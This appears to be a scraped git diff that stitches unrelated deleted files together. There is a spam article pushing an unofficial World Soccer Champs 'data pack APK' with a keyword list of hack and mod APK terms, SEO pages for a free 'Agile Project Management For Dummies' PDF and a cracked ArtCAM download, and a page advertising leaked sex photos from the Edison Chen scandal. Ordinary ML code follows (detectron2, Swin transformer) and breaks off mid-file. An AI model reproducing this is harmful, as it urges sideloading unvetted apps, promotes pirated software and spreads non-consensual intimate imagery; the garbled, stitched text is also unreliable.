      • Google Play achievements & leaderboards to see who ranks on top. You can earn achievements for completing various tasks and challenges in the game, and compare your performance with other players on the global leaderboards.
      • -
      -

      What is the data pack APK?

      -

      A downloadable file that adds real player names to the game

      -

      The data pack APK is a file that you can download from the internet that adds real player names to World Soccer Champs. The file is not part of the official game, but it is created by fans who want to enhance their gaming experience. The data pack APK contains information about thousands of real players from different leagues and countries, such as their names, ratings, and positions (a purely hypothetical example of such an entry is sketched below).
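
      The data pack's internal format is not documented in this article, so the snippet below is purely hypothetical: it only illustrates the kind of per-player fields (name, rating, position, club) such a pack would need to carry, not the actual file layout used by World Soccer Champs.

```python
# Hypothetical example only -- the real data-pack format is not documented here.
player_entry = {
    "name": "Example Player",   # real player name shown in-game
    "rating": 87,               # overall rating used for match simulation
    "position": "ST",           # playing position (e.g. GK, CB, CM, ST)
    "club": "Example FC",       # club the player is assigned to
}

def describe(player: dict) -> str:
    """Format one entry the way a squad screen might display it."""
    return f'{player["name"]} ({player["position"]}, {player["rating"]}) - {player["club"]}'

print(describe(player_entry))
```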

      How to download and install the data pack APK

      -

      To download and install the data pack APK, you need to follow these steps:

      -
        -
      1. Download the data pack APK file from a reliable source on the internet. You can search for "world soccer champs data pack apk" on Google or any other search engine, and choose a website that offers the file for free. Make sure you download the latest version of the file, which is compatible with the latest version of the game.
      2. -
      3. Enable unknown sources on your device. Before you can install the data pack APK, you need to allow your device to install apps from sources other than Google Play. To do this, go to your device's settings, then security, then unknown sources, and toggle it on.
      4. -
      5. Locate and install the data pack APK file. After you have downloaded the file, you need to find it on your device's storage, usually in the downloads folder. Tap on the file and follow the instructions to install it. You may need to grant some permissions to the app during the installation process.
      6. -
      7. Launch World Soccer Champs and enjoy. Once you have installed the data pack APK, you can open World Soccer Champs and see the real player names in the game. You can also check for updates in the game's settings, and download them if available.
      8. -
      -

      Why should you play World Soccer Champs with the data pack APK?

      -

      Benefits of playing with real player names

      -

      Playing World Soccer Champs with the data pack APK has many benefits that will enhance your gaming experience. Some of these benefits are:

      -
        -
      • More realism and immersion. Playing with real player names will make you feel like you are managing a real team and competing in real tournaments. You will be able to recognize your favorite players and their skills, and enjoy their realistic animations and celebrations.
      • -
      • More fun and challenge. Playing with real player names will also make the game more fun and challenging. You will be able to test your knowledge of football and compare your results with real-life outcomes. You will also face tougher opponents and more varied strategies from different teams.
      • -
      • More customization and creativity. Playing with real player names will also give you more options to customize and create your own team. You will be able to mix and match players from different clubs and countries, and create your own fantasy squad. You will also be able to edit your players' names, ratings, attributes, and positions if you want.
      • -
      -

      Tips and tricks for playing World Soccer Champs

      -

      To help you get started with playing World Soccer Champs with the data pack APK, here are some tips and tricks that will improve your performance and enjoyment:

      -

      world soccer champs game download apk
      -world soccer champs mod apk unlimited money
      -world soccer champs 2023 data pack
      -world soccer champs apk latest version
      -world soccer champs hack apk download
      -world soccer champs real player names apk
      -world soccer champs offline apk
      -world soccer champs apk for android
      -world soccer champs data pack free
      -world soccer champs apk pure
      -world soccer champs mod apk revdl
      -world soccer champs data pack update
      -world soccer champs apk obb
      -world soccer champs hack apk 2023
      -world soccer champs data pack download link
      -world soccer champs mod apk android 1
      -world soccer champs data pack file
      -world soccer champs apk mirror
      -world soccer champs hack apk ios
      -world soccer champs data pack install
      -world soccer champs mod apk rexdl
      -world soccer champs data pack 2023 download
      -world soccer champs apk uptodown
      -world soccer champs hack apk online
      -world soccer champs data pack how to use
      -world soccer champs mod apk unlimited coins
      -world soccer champs data pack reddit
      -world soccer champs apk mod menu
      -world soccer champs hack apk no root
      -world soccer champs data pack error
      -world soccer champs mod apk happymod
      -world soccer champs data pack not working
      -world soccer champs apk old version
      -world soccer champs hack apk 2023 download
      -world soccer champs data pack zip file download
      -world soccer champs mod apk all unlocked
      -world soccer champs data pack latest version
      -world soccer champs apk no ads
      -world soccer champs hack apk unlimited everything
      -world soccer champs data pack size
      -world soccer champs mod apk offline
      -world soccer champs data pack google drive link
      -world soccer champs apk pro
      -world soccer champs hack apk modded
      -world soccer champs data pack folder name
      -world soccer champs mod apk online multiplayer

      -
        -
      • Choose a suitable difficulty level. The game has four difficulty levels: easy, normal, hard, and expert. You can choose the one that suits your skill level and preference. The higher the difficulty level, the more intelligent and aggressive your opponents will be.
      • -
      • Use different tactics and formations. The game allows you to choose from various tactics and formations for your team. You can change them before or during a match, depending on the situation. You can also customize your own tactics and formations by adjusting sliders for passing, pressing, width, etc.
      • -
      • Swipe smartly and accurately. The game uses swipe-controls for passing, shooting, dribbling, tackling, and saving. You need to swipe smartly and accurately to execute these actions successfully. The direction, speed, length, and timing of your swipe will determine the outcome of your action.
      • -
      • Manage your team wisely. The game also requires you to manage your team wisely. You need to balance your budget, scout new players, train your players, rotate your squad, deal with injuries, etc. You also need to keep an eye on your team's morale, chemistry, and fatigue levels.
      • -
      • Have fun and experiment. The most important tip is to have fun and experiment with different aspects of the game. You can try different teams, players, tactics, formations, etc., and see what works best for you. You can also challenge yourself by setting goals or playing in different modes.
      • -
      -

      Conclusion

      -

      Summary of the main points

      -

      In conclusion, World Soccer Champs is a fantastic soccer game for Android devices that offers a lot of features and fun for football fans. The game becomes even better when you download and install the data pack APK that adds real player names to the game. The data pack

      Call to action and invitation to download the game and the data pack APK

      -

      If you are looking for a soccer game that is easy to play, hard to master, and full of realism and excitement, you should definitely download World Soccer Champs and its data pack APK. You will not regret it, as you will have hours of fun and challenge with this amazing game. You can download World Soccer Champs from Google Play for free, and you can find the data pack APK from various websites on the internet. Just follow the steps we mentioned above, and you will be ready to enjoy the game with real player names. Don't wait any longer, download World Soccer Champs and its data pack APK today, and become the ultimate soccer champion!

      -

      FAQs

      -

      Q1: Is World Soccer Champs free to play?

      -

      A1: Yes, World Soccer Champs is free to play. You can download it from Google Play without paying anything. However, the game does have some optional in-app purchases that can enhance your gaming experience, such as removing ads, unlocking all leagues and cups, or buying coins and gems.

      -

      Q2: How many leagues and cups are available in World Soccer Champs?

      -

      A2: World Soccer Champs has over 200 leagues and cups from all around the world. You can play in local clubs or national teams, and compete in various tournaments, such as the World Cup, the Champions League, the Copa America, the Euro Cup, etc.

      -

      Q3: How can I update the data pack APK?

      -

      A3: You can update the data pack APK by downloading the latest version of the file from the internet. You can check for updates in the game's settings, or on the website where you downloaded the file. You can also uninstall and reinstall the data pack APK if you encounter any problems.

      -

      Q4: Can I play World Soccer Champs offline?

      -

      A4: Yes, you can play World Soccer Champs offline. You don't need an internet connection to play the game, except for downloading updates or accessing some online features, such as achievements and leaderboards.

      -

      Q5: How can I contact the developers of World Soccer Champs?

      -

      A5: You can contact the developers of World Soccer Champs by sending them an email at monkeyibrow@gmail.com. You can also follow them on Facebook or Twitter for news and updates about the game.

      401be4b1e0
      -
      -
      \ No newline at end of file diff --git a/spaces/contluForse/HuggingGPT/assets/Agile Project Management For Dummies Pdf Download !FREE!.md b/spaces/contluForse/HuggingGPT/assets/Agile Project Management For Dummies Pdf Download !FREE!.md deleted file mode 100644 index d19d979181ba73a337934193c31785b09b24984f..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Agile Project Management For Dummies Pdf Download !FREE!.md +++ /dev/null @@ -1,30 +0,0 @@ -
      -

      In today's time-crunched, cost-conscious global business environment, tight project deadlines and stringent expectations are the norm. Now with 25% new and updated content, Project Management For Dummies, 3rd Edition introduces you to the principles of successful project management and shows you how to motivate any team to gain maxim...

      -

      In today's time-crunched, cost-conscious global business environment, tight project deadlines and stringent expectations are the norm. So how can you juggle all the skills and responsibilities it takes to shine as a project management maven? Updated in a brand-new edition, Project Management For Dummies offers everything you need to ...

      -

      agile project management for dummies pdf download


      Download 🆗 https://ssurll.com/2uzxdL



      -

      The Manifesto for Agile Software Development, commonly known as the Agile Manifesto, is an intentionally streamlined expression of the core values of agile project management and product development. Use this manifesto as a guide to implement agile practices into your products.

      -

      This first edition comes in paperback, almost one-inch thick. It has 360 pages and was published in April 2012 under the For Dummies brand of Wiley Publishing. The front cover looks like other books of the same series, with the familiar black and yellow theme. The back cover contains more descriptions of the content and benefits of using agile project management. ISBN-10: 1118026241; ISBN-13: 978-1118026243.

      -

      Agile Project Management for Dummies is meant for every project manager, project team member, or project stakeholder. In other words, it is for any regular person who has been, is presently, or will be involved in projects, traditional or agile, in a business or organizational setting. It will be valuable for those who are interested to know more about agile practices and methodologies with the intention of applying it to realize its promoted benefits.

      -

      Eddie (Goodreads), who has knowledge of and experience with traditional project methodology for software development, felt more confident and ready to tackle in-depth agile PM topics after reading it. He also differentiated it from the other, more basic books of the series, and complimented it for giving the reader a more solid foundation.

      -

      Agile Project Management for Dummies is divided into six parts with a total of 20 chapters. The first part introduces agile PM to give the reader a better understanding of it. The second part describes the effects of following agile practices, while the third part shows the reader how to work on an agile project. The fourth part provides the reader with practical knowledge of managing different PM areas using an agile approach. The fifth part discusses how to ensure success, while the sixth part gives more information on agile benefits, metrics, and resources.

      -

      -

      Agile Project Management for Dummies is an affordable book that gives more than just an introduction to a very popular business management technique. According to the author, agile PM is now being applied to more and more industries and functions, such as infrastructure, finance, and even recruitment, aside from software development. Learning about this flexible framework gives people the ability to apply it to their specific domain knowledge and quickly come up with a solution that really works.

      -

      Scrum is an agile project management framework that helps teams structure and manage their work through a set of values, principles, and practices. Much like a rugby team (where it gets its name) training for the big game, scrum encourages teams to learn through experiences, self-organize while working on a problem, and reflect on their wins and losses to continuously improve.

      -

      Agile project management is an iterative, incremental way to coordinate activities for engineering, information technology, and other business areas. Because it is a highly flexible, interactive methodology, teams can quickly identify and respond to challenges, and ultimately deliver better outcomes, faster.

      -

      An agile project plan is based on features. The plan estimates how long it will take for each feature to be delivered, without much detail on how it will be delivered. And because the project plans are focused on features, you can group similar features into sprints.

      -

      Also known as an agile project schedule, this template lets you add your tasks, who is responsible, start and end dates, and status. The duration for each task will be automatically calculated. This template also features a Gantt chart (a visual representation of your project timeline), which will automatically adjust when you add your own data to the table.

      -


      Agile project management empowers teams to adapt to change with increased speed and flexibility. Learn how to implement Agile PM and get the most out of the methodology.

      Get the free e-book

      -

      An agile roadmap represents a strategic overview of where the product is headed in the mid-to long-term. It steers the direction of your product and sets expectations within your company. A traditional roadmap can sometimes act as a strict project plan, but in an agile organization, the roadmap just provides guidance and clarity.

      -

      Instead of a static testing plan that must happen at a certain time, test plans in agile projects should be dynamic and iterative. The testing phase becomes an extension of the requirements prioritization process so that the most up-to-date information is used when defining tests and to avoid any misunderstanding about scope.

      -

      Super-adaptable, Agile project management is an incremental and non-linear approach to project management. It focuses on breaking down large projects into more manageable tasks, which are completed in short iterations throughout the project life cycle. Teams that adopt the Agile methodology are able to complete work faster, adapt to changing project requirements, and optimize their workflow.

      -

      Agile project management may seem like a 21st-century phenomenon, but it has its roots in rapid application development (RAD), pioneered for software development by the English IT engineer James Martin in the 1990s.

      -

      Originally created for software development, the Agile approach to project management is quickly being adapted by more than just IT teams. Some industries also looking at the Agile methodology and other Agile frameworks to deliver innovative products in uncertain environments include:

      -

      As sophisticated as technology gets, the human element will always play an important role in any kind of project management. Relying too heavily on processes and tools results in an inability to adapt to changing circumstances.

      -

      This value is one of the biggest departures from traditional project management. Historically, change was seen as an expense, and one to be avoided. Agile allows for continuous change throughout the life of any given project. Each sprint provides an opportunity for review and course correction.

      -

      In traditional waterfall project management, there is one implementation date that comes after an entire project has been developed. When using Agile, however, your project uses shorter development cycles (called sprints) with features released at the end of each cycle.

      -

      Resistance to change is a common pitfall. Waterfall project management remains top of the tree and the go-to for companies reluctant to try out new workflows. There could be a lack of support from management, who want old-fashioned measurables, or colleagues who just want to be told what to do.

      -

      There are a wide range of Agile project management tools available. The best one can depend on your business, industry and any priority areas. Some of the most popular frameworks to implement an Agile methodology include:

      -

      These are the most basic and important parts of Agile project management. As you transition your team to an Agile methodology, these processes, Agile software and tools, roles and principles will help you change your mindset and begin working together to be more flexible and adapt to changes as they come.

      -

      As a new world order is formed, entrepreneurial and engineering teams that are small but quick and can mobilize collectively, reaching customers without extending time to market, are preferred over the traditional project method. Despite this preference, the number of leaders in academia and business who adopt the concept of agile engineering teams has recently been decreasing steadily. The study consists of a literature review in the introduction, the definition of the model in which the criteria are shared, and a results stage, and it explains the relationship between R&D expenses as a share of national income in OECD countries, the patent numbers of engineering management information systems, and teams built on the agile model concept.

      aaccfb2cb3
      -
      -
      \ No newline at end of file diff --git a/spaces/contluForse/HuggingGPT/assets/Artcam Pro 2012 Free WORK Download.md b/spaces/contluForse/HuggingGPT/assets/Artcam Pro 2012 Free WORK Download.md deleted file mode 100644 index eeadc1f96611490168809292f7e68827bd173e39..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Artcam Pro 2012 Free WORK Download.md +++ /dev/null @@ -1,11 +0,0 @@ -

      artcam pro 2012 free download


      Download Ziphttps://ssurll.com/2uzwKu



      - -March 5, 2020 - Download artcam 2012 Pro SP2 32bit 64bit full Crack 100% working link Artcam pro 2012 32bit 64bit full resolution Delcam ArtCAM 2012 SP2. Description of the program ArtCAM Pro 2012 SP2 is a very powerful vector graphics editor that creates and models 3D models. -ArtCAM Pro - 2D and 3D development software. -The free version of ArtCAM Pro allows you to do. -ArtCAM Pro - software for developing 3D models and creating reliefs. -The ArtCAM 2010 Pro program is designed to create spatial models of parts and prepare them for subsequent manufacturing on CNC machines. -This is software. 8a78ff9644
      -
      -
      -

      diff --git a/spaces/contluForse/HuggingGPT/assets/Bertolini Materiali Da Costruzione Vol 1 Torrent Everything You Need to Know about Construction Materials in One Volume.md b/spaces/contluForse/HuggingGPT/assets/Bertolini Materiali Da Costruzione Vol 1 Torrent Everything You Need to Know about Construction Materials in One Volume.md deleted file mode 100644 index 38e5b938a648581ebe9ab8f9b231f46bf33623bf..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Bertolini Materiali Da Costruzione Vol 1 Torrent Everything You Need to Know about Construction Materials in One Volume.md +++ /dev/null @@ -1,6 +0,0 @@ -

      [FSX P3D] Drzewiecki Design - Washington X v1.25 version download


      Download →→→ https://ssurll.com/2uzw5G



      -
      - aaccfb2cb3
      -
      -
      -

      diff --git a/spaces/contluForse/HuggingGPT/assets/Edison Chen Scandal.rar [VERIFIED].md b/spaces/contluForse/HuggingGPT/assets/Edison Chen Scandal.rar [VERIFIED].md deleted file mode 100644 index 2f063c8e3a2ed350c5e3e0ed2523d4cc704087a1..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Edison Chen Scandal.rar [VERIFIED].md +++ /dev/null @@ -1,6 +0,0 @@ -

      Edison Chen Scandal.rar


      DOWNLOADhttps://ssurll.com/2uzyN5



      -
      -Download edison chen Torrents absolutely for free, Magnet Link And Direct Download also Available. ... Hot Asian Girl Huge Collection edison Chen Pics 2008 rar. 0043.00 ... Edison Chen Sex Photos Scandal Starring Slutty Cecilia Cheung,. 1fdad05405
      -
      -
      -

      diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mediapipe_face/__init__.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mediapipe_face/__init__.py deleted file mode 100644 index f74edfb187e4e39583ed92bfe69ea29c42a34ddc..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mediapipe_face/__init__.py +++ /dev/null @@ -1,5 +0,0 @@ -from .mediapipe_face_common import generate_annotation - - -def apply_mediapipe_face(image, max_faces: int = 1, min_confidence: float = 0.5): - return generate_annotation(image, max_faces, min_confidence) diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmseg/models/decode_heads/__init__.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmseg/models/decode_heads/__init__.py deleted file mode 100644 index ac66d3cfe0ea04af45c0f3594bf135841c3812e3..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmseg/models/decode_heads/__init__.py +++ /dev/null @@ -1,28 +0,0 @@ -from .ann_head import ANNHead -from .apc_head import APCHead -from .aspp_head import ASPPHead -from .cc_head import CCHead -from .da_head import DAHead -from .dm_head import DMHead -from .dnl_head import DNLHead -from .ema_head import EMAHead -from .enc_head import EncHead -from .fcn_head import FCNHead -from .fpn_head import FPNHead -from .gc_head import GCHead -from .lraspp_head import LRASPPHead -from .nl_head import NLHead -from .ocr_head import OCRHead -# from .point_head import PointHead -from .psa_head import PSAHead -from .psp_head import PSPHead -from .sep_aspp_head import DepthwiseSeparableASPPHead -from .sep_fcn_head import DepthwiseSeparableFCNHead -from .uper_head import UPerHead - -__all__ = [ - 'FCNHead', 'PSPHead', 'ASPPHead', 'PSAHead', 'NLHead', 'GCHead', 'CCHead', - 'UPerHead', 'DepthwiseSeparableASPPHead', 'ANNHead', 'DAHead', 'OCRHead', - 'EncHead', 'DepthwiseSeparableFCNHead', 'FPNHead', 'EMAHead', 'DNLHead', - 'APCHead', 'DMHead', 'LRASPPHead' -] diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/data/dataset_mapper.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/data/dataset_mapper.py deleted file mode 100644 index 3bb6bb1057a68bfb12e55872f391065f02023ed3..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/data/dataset_mapper.py +++ /dev/null @@ -1,191 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import copy -import logging -import numpy as np -from typing import List, Optional, Union -import torch - -from annotator.oneformer.detectron2.config import configurable - -from . import detection_utils as utils -from . import transforms as T - -""" -This file contains the default mapping that's applied to "dataset dicts". -""" - -__all__ = ["DatasetMapper"] - - -class DatasetMapper: - """ - A callable which takes a dataset dict in Detectron2 Dataset format, - and map it into a format used by the model. - - This is the default callable to be used to map your dataset dict into training data. - You may need to follow it to implement your own one for customized logic, - such as a different way to read or transform images. - See :doc:`/tutorials/data_loading` for details. - - The callable currently does the following: - - 1. Read the image from "file_name" - 2. 
Applies cropping/geometric transforms to the image and annotations - 3. Prepare data and annotations to Tensor and :class:`Instances` - """ - - @configurable - def __init__( - self, - is_train: bool, - *, - augmentations: List[Union[T.Augmentation, T.Transform]], - image_format: str, - use_instance_mask: bool = False, - use_keypoint: bool = False, - instance_mask_format: str = "polygon", - keypoint_hflip_indices: Optional[np.ndarray] = None, - precomputed_proposal_topk: Optional[int] = None, - recompute_boxes: bool = False, - ): - """ - NOTE: this interface is experimental. - - Args: - is_train: whether it's used in training or inference - augmentations: a list of augmentations or deterministic transforms to apply - image_format: an image format supported by :func:`detection_utils.read_image`. - use_instance_mask: whether to process instance segmentation annotations, if available - use_keypoint: whether to process keypoint annotations if available - instance_mask_format: one of "polygon" or "bitmask". Process instance segmentation - masks into this format. - keypoint_hflip_indices: see :func:`detection_utils.create_keypoint_hflip_indices` - precomputed_proposal_topk: if given, will load pre-computed - proposals from dataset_dict and keep the top k proposals for each image. - recompute_boxes: whether to overwrite bounding box annotations - by computing tight bounding boxes from instance mask annotations. - """ - if recompute_boxes: - assert use_instance_mask, "recompute_boxes requires instance masks" - # fmt: off - self.is_train = is_train - self.augmentations = T.AugmentationList(augmentations) - self.image_format = image_format - self.use_instance_mask = use_instance_mask - self.instance_mask_format = instance_mask_format - self.use_keypoint = use_keypoint - self.keypoint_hflip_indices = keypoint_hflip_indices - self.proposal_topk = precomputed_proposal_topk - self.recompute_boxes = recompute_boxes - # fmt: on - logger = logging.getLogger(__name__) - mode = "training" if is_train else "inference" - logger.info(f"[DatasetMapper] Augmentations used in {mode}: {augmentations}") - - @classmethod - def from_config(cls, cfg, is_train: bool = True): - augs = utils.build_augmentation(cfg, is_train) - if cfg.INPUT.CROP.ENABLED and is_train: - augs.insert(0, T.RandomCrop(cfg.INPUT.CROP.TYPE, cfg.INPUT.CROP.SIZE)) - recompute_boxes = cfg.MODEL.MASK_ON - else: - recompute_boxes = False - - ret = { - "is_train": is_train, - "augmentations": augs, - "image_format": cfg.INPUT.FORMAT, - "use_instance_mask": cfg.MODEL.MASK_ON, - "instance_mask_format": cfg.INPUT.MASK_FORMAT, - "use_keypoint": cfg.MODEL.KEYPOINT_ON, - "recompute_boxes": recompute_boxes, - } - - if cfg.MODEL.KEYPOINT_ON: - ret["keypoint_hflip_indices"] = utils.create_keypoint_hflip_indices(cfg.DATASETS.TRAIN) - - if cfg.MODEL.LOAD_PROPOSALS: - ret["precomputed_proposal_topk"] = ( - cfg.DATASETS.PRECOMPUTED_PROPOSAL_TOPK_TRAIN - if is_train - else cfg.DATASETS.PRECOMPUTED_PROPOSAL_TOPK_TEST - ) - return ret - - def _transform_annotations(self, dataset_dict, transforms, image_shape): - # USER: Modify this if you want to keep them for some reason. 
- for anno in dataset_dict["annotations"]: - if not self.use_instance_mask: - anno.pop("segmentation", None) - if not self.use_keypoint: - anno.pop("keypoints", None) - - # USER: Implement additional transformations if you have other types of data - annos = [ - utils.transform_instance_annotations( - obj, transforms, image_shape, keypoint_hflip_indices=self.keypoint_hflip_indices - ) - for obj in dataset_dict.pop("annotations") - if obj.get("iscrowd", 0) == 0 - ] - instances = utils.annotations_to_instances( - annos, image_shape, mask_format=self.instance_mask_format - ) - - # After transforms such as cropping are applied, the bounding box may no longer - # tightly bound the object. As an example, imagine a triangle object - # [(0,0), (2,0), (0,2)] cropped by a box [(1,0),(2,2)] (XYXY format). The tight - # bounding box of the cropped triangle should be [(1,0),(2,1)], which is not equal to - # the intersection of original bounding box and the cropping box. - if self.recompute_boxes: - instances.gt_boxes = instances.gt_masks.get_bounding_boxes() - dataset_dict["instances"] = utils.filter_empty_instances(instances) - - def __call__(self, dataset_dict): - """ - Args: - dataset_dict (dict): Metadata of one image, in Detectron2 Dataset format. - - Returns: - dict: a format that builtin models in detectron2 accept - """ - dataset_dict = copy.deepcopy(dataset_dict) # it will be modified by code below - # USER: Write your own image loading if it's not from a file - image = utils.read_image(dataset_dict["file_name"], format=self.image_format) - utils.check_image_size(dataset_dict, image) - - # USER: Remove if you don't do semantic/panoptic segmentation. - if "sem_seg_file_name" in dataset_dict: - sem_seg_gt = utils.read_image(dataset_dict.pop("sem_seg_file_name"), "L").squeeze(2) - else: - sem_seg_gt = None - - aug_input = T.AugInput(image, sem_seg=sem_seg_gt) - transforms = self.augmentations(aug_input) - image, sem_seg_gt = aug_input.image, aug_input.sem_seg - - image_shape = image.shape[:2] # h, w - # Pytorch's dataloader is efficient on torch.Tensor due to shared-memory, - # but not efficient on large generic data structures due to the use of pickle & mp.Queue. - # Therefore it's important to use torch.Tensor. - dataset_dict["image"] = torch.as_tensor(np.ascontiguousarray(image.transpose(2, 0, 1))) - if sem_seg_gt is not None: - dataset_dict["sem_seg"] = torch.as_tensor(sem_seg_gt.astype("long")) - - # USER: Remove if you don't use pre-computed proposals. - # Most users would not need this feature. - if self.proposal_topk is not None: - utils.transform_proposals( - dataset_dict, image_shape, transforms, proposal_topk=self.proposal_topk - ) - - if not self.is_train: - # USER: Modify this if you want to keep them for some reason. - dataset_dict.pop("annotations", None) - dataset_dict.pop("sem_seg_file_name", None) - return dataset_dict - - if "annotations" in dataset_dict: - self._transform_annotations(dataset_dict, transforms, image_shape) - - return dataset_dict diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/modeling/backbone/swin.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/modeling/backbone/swin.py deleted file mode 100644 index d5a651d6f4d2933e8f329bd13c04286488f25753..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/modeling/backbone/swin.py +++ /dev/null @@ -1,695 +0,0 @@ -# Copyright (c) Facebook, Inc. 
and its affiliates. All Rights Reserved -""" -Implementation of Swin models from :paper:`swin`. - -This code is adapted from https://github.com/SwinTransformer/Swin-Transformer-Object-Detection/blob/master/mmdet/models/backbones/swin_transformer.py with minimal modifications. # noqa --------------------------------------------------------- -Swin Transformer -Copyright (c) 2021 Microsoft -Licensed under The MIT License [see LICENSE for details] -Written by Ze Liu, Yutong Lin, Yixuan Wei --------------------------------------------------------- -LICENSE: https://github.com/SwinTransformer/Swin-Transformer-Object-Detection/blob/461e003166a8083d0b620beacd4662a2df306bd6/LICENSE -""" - -import numpy as np -import torch -import torch.nn as nn -import torch.nn.functional as F -import torch.utils.checkpoint as checkpoint - -from annotator.oneformer.detectron2.modeling.backbone.backbone import Backbone - -_to_2tuple = nn.modules.utils._ntuple(2) - - -class Mlp(nn.Module): - """Multilayer perceptron.""" - - def __init__( - self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.0 - ): - super().__init__() - out_features = out_features or in_features - hidden_features = hidden_features or in_features - self.fc1 = nn.Linear(in_features, hidden_features) - self.act = act_layer() - self.fc2 = nn.Linear(hidden_features, out_features) - self.drop = nn.Dropout(drop) - - def forward(self, x): - x = self.fc1(x) - x = self.act(x) - x = self.drop(x) - x = self.fc2(x) - x = self.drop(x) - return x - - -def window_partition(x, window_size): - """ - Args: - x: (B, H, W, C) - window_size (int): window size - Returns: - windows: (num_windows*B, window_size, window_size, C) - """ - B, H, W, C = x.shape - x = x.view(B, H // window_size, window_size, W // window_size, window_size, C) - windows = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(-1, window_size, window_size, C) - return windows - - -def window_reverse(windows, window_size, H, W): - """ - Args: - windows: (num_windows*B, window_size, window_size, C) - window_size (int): Window size - H (int): Height of image - W (int): Width of image - Returns: - x: (B, H, W, C) - """ - B = int(windows.shape[0] / (H * W / window_size / window_size)) - x = windows.view(B, H // window_size, W // window_size, window_size, window_size, -1) - x = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(B, H, W, -1) - return x - - -class WindowAttention(nn.Module): - """Window based multi-head self attention (W-MSA) module with relative position bias. - It supports both of shifted and non-shifted window. - Args: - dim (int): Number of input channels. - window_size (tuple[int]): The height and width of the window. - num_heads (int): Number of attention heads. - qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. - Default: True - qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set - attn_drop (float, optional): Dropout ratio of attention weight. Default: 0.0 - proj_drop (float, optional): Dropout ratio of output. 
Default: 0.0 - """ - - def __init__( - self, - dim, - window_size, - num_heads, - qkv_bias=True, - qk_scale=None, - attn_drop=0.0, - proj_drop=0.0, - ): - - super().__init__() - self.dim = dim - self.window_size = window_size # Wh, Ww - self.num_heads = num_heads - head_dim = dim // num_heads - self.scale = qk_scale or head_dim**-0.5 - - # define a parameter table of relative position bias - self.relative_position_bias_table = nn.Parameter( - torch.zeros((2 * window_size[0] - 1) * (2 * window_size[1] - 1), num_heads) - ) # 2*Wh-1 * 2*Ww-1, nH - - # get pair-wise relative position index for each token inside the window - coords_h = torch.arange(self.window_size[0]) - coords_w = torch.arange(self.window_size[1]) - coords = torch.stack(torch.meshgrid([coords_h, coords_w])) # 2, Wh, Ww - coords_flatten = torch.flatten(coords, 1) # 2, Wh*Ww - relative_coords = coords_flatten[:, :, None] - coords_flatten[:, None, :] # 2, Wh*Ww, Wh*Ww - relative_coords = relative_coords.permute(1, 2, 0).contiguous() # Wh*Ww, Wh*Ww, 2 - relative_coords[:, :, 0] += self.window_size[0] - 1 # shift to start from 0 - relative_coords[:, :, 1] += self.window_size[1] - 1 - relative_coords[:, :, 0] *= 2 * self.window_size[1] - 1 - relative_position_index = relative_coords.sum(-1) # Wh*Ww, Wh*Ww - self.register_buffer("relative_position_index", relative_position_index) - - self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias) - self.attn_drop = nn.Dropout(attn_drop) - self.proj = nn.Linear(dim, dim) - self.proj_drop = nn.Dropout(proj_drop) - - nn.init.trunc_normal_(self.relative_position_bias_table, std=0.02) - self.softmax = nn.Softmax(dim=-1) - - def forward(self, x, mask=None): - """Forward function. - Args: - x: input features with shape of (num_windows*B, N, C) - mask: (0/-inf) mask with shape of (num_windows, Wh*Ww, Wh*Ww) or None - """ - B_, N, C = x.shape - qkv = ( - self.qkv(x) - .reshape(B_, N, 3, self.num_heads, C // self.num_heads) - .permute(2, 0, 3, 1, 4) - ) - q, k, v = qkv[0], qkv[1], qkv[2] # make torchscript happy (cannot use tensor as tuple) - - q = q * self.scale - attn = q @ k.transpose(-2, -1) - - relative_position_bias = self.relative_position_bias_table[ - self.relative_position_index.view(-1) - ].view( - self.window_size[0] * self.window_size[1], self.window_size[0] * self.window_size[1], -1 - ) # Wh*Ww,Wh*Ww,nH - relative_position_bias = relative_position_bias.permute( - 2, 0, 1 - ).contiguous() # nH, Wh*Ww, Wh*Ww - attn = attn + relative_position_bias.unsqueeze(0) - - if mask is not None: - nW = mask.shape[0] - attn = attn.view(B_ // nW, nW, self.num_heads, N, N) + mask.unsqueeze(1).unsqueeze(0) - attn = attn.view(-1, self.num_heads, N, N) - attn = self.softmax(attn) - else: - attn = self.softmax(attn) - - attn = self.attn_drop(attn) - - x = (attn @ v).transpose(1, 2).reshape(B_, N, C) - x = self.proj(x) - x = self.proj_drop(x) - return x - - -class SwinTransformerBlock(nn.Module): - """Swin Transformer Block. - Args: - dim (int): Number of input channels. - num_heads (int): Number of attention heads. - window_size (int): Window size. - shift_size (int): Shift size for SW-MSA. - mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. - qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True - qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set. - drop (float, optional): Dropout rate. Default: 0.0 - attn_drop (float, optional): Attention dropout rate. Default: 0.0 - drop_path (float, optional): 